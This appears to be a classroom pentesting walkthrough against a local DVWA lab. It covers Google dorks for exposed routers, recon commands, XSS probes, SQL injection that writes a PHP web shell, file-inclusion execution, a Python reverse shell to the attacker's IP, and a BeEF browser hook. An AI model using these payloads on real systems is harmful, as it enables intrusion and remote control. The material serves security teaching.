This is a simple security / pentesting demo run for Abakus at NTNU in Trondheim. There are two hosts used in this demo:
Victim (Ubuntu 16.04): 192.168.56.101
Attacker (Kali Linux): 192.168.56.102
To adopt this demo, simply change those IPs in the examples.
DO NOT use the techniques shown here towards live targets on the internet, your friends, or school resources. Doing so is most likely against the law and is simply not cool, always ask for explicit permission before attempting any form of pentesting!
This was done on a Ubuntu 16.04 server.
$ sudo apt-get update && apt-get install docker.io
$ sudo systemctl start docker
Pull the image from DockerHub:
$ sudo docker pull citizenstig/dvwa
Fire up the container:
$ sudo docker run -d -p 80:80 citizenstig/dvwa:latest
- DVWA is now available at
http://192.168.56.101:80
- Follow the instructions to setup the MySQL database within the browser
- Refresh and login, default username is
admin
and the default password ispassword
Popular search operations
site
, filetype
, inurl
, intitle
Database for URL queries for hacking: Google Hacking DB
Find hardware with known vulnerabilities
intitle:"SpeedStream Router Management Interface"
Web accessible, Open Cisco Routers
inurl:"level/15/exec/-/show"
Installation instructions: https://github.com/laramies/theHarvester
Example command for assessing google
theharvester -d megacorpone.com -l 500 -b all > megacorpone.txt
Scanning the Victim's machine through Nmap
sudo nmap 192.168.56.102 -sV -sC -O
- Go to
http://192.168.56.101/security.php
and set security level to low. - Go to
http://192.168.56.101/vulnerabilities/xss_r/
. Explore the functionality. - Reflect on the source code by clicking "View Source" in the bottom right.
- Play around with some input, does the application reflect
<
,'
,"
? - Can you put actual HTML tags in there, like
<pre>
,<a>
? - Attempt to use the classic
<script>alert(1)</script>
to check for XSS. - Show the same with the persistant/stored XSS at
http://192.168.56.101/vulnerabilities/xss_s/
- Go to
http://192.168.56.101/security.php
and set security level to low. - Go to
http://192.168.56.101/vulnerabilities/sqli/
and explore the functionality - View the source by clicking "View Source" in the bottom right.
- Input a single quote
'
into the input field.- Makes query:
"SELECT first_name, last_name FROM users WHERE user_id = '''";
- Makes query:
- Input
1' OR 1=1;#
into the input field.- Makes query:
"SELECT first_name, last_name FROM users WHERE user_id = '1' OR 1=1;#'";
- Makes query:
- Demonstrate that arbitrary information can be received:
1' union select all 1,@@version;#
1' union select all 1,table_name FROM information_schema.tables;#
- Show that files can be written as well:
1' union select all 1,"<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '/tmp/backdoor.php';#
- Take advantage of it with path traversal vulnerability:
http://192.168.56.101/vulnerabilities/fi/?page=../../../../../tmp/backdoor.php&cmd=id
- Run
sqlmap -u "http://192.168.56.101/vulnerabilities/sqli/?id=123&Submit=Submit#"
. - Fetch cookie values from CookieManager+
- Run
sqlmap -u "http://192.168.56.101/vulnerabilities/sqli/?id=123&Submit=Submit#" --cookie="security=low; PHPSESSID=[SESSION FROM COOKIES]"
- Run
sqlmap -u "http://192.168.56.101/vulnerabilities/sqli/?id=123&Submit=Submit#" --cookie="security=low; PHPSESSID=[SESSION FROM COOKIES]" --tables
- Want to take advantage of the SQLi and the path traversal vulnerability we found previously.
- Reflect on why we'd want to use a reverse shell (victim -> attacker) instead of a regular shell (attacker -> victim).
- Prepare to receive the shell by using a netcat listener on the attacker machine:
nc -l -p 5454
- Confirm that python is available on the victim:
http://192.168.56.101/vulnerabilities/fi/?page=../../../../../tmp/backdoor.php&cmd=which python
- We'll get the reverse shell using the following Python one-liner:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- Execute the reverse shell on the victim:
http://192.168.56.101/vulnerabilities/fi/?page=../../../../../tmp/backdoor.php&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",5454));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- Shell, woo!
- Fire up BeEF in Kali:
root@kali:~# beef-xss
- Open up the BeEF GUI at
http://192.168.56.101:3000/ui/panel
and login with the credentials beef:beef - Host a simple HTML page with the following content:
root@kali:/var/www/html# cat beef.html
<html>
<head>
<script src="http://192.168.56.102:3000/hook.js"></script>
</head>
<body>
<h1>Welcome to my awesome page</h1>
<h2>Enjoy your stay!</h2>
</body>
- Get hooked by going to the URI
http://192.168.56.101:3000/beef.html
in a browser of your choosing - Show some functionality by selecting
hoooked browser -> Commands -> Browser -> Hooked Domain -> Create Alert Dialog
- Damn Vulnerable Web Application: http://www.dvwa.co.uk/
- WebGoat: https://github.com/WebGoat/WebGoat
- Mutillidae 2: https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project
XSS: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
SQL injection: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
- Hacker101 - Video Resources https://www.hacker101.com/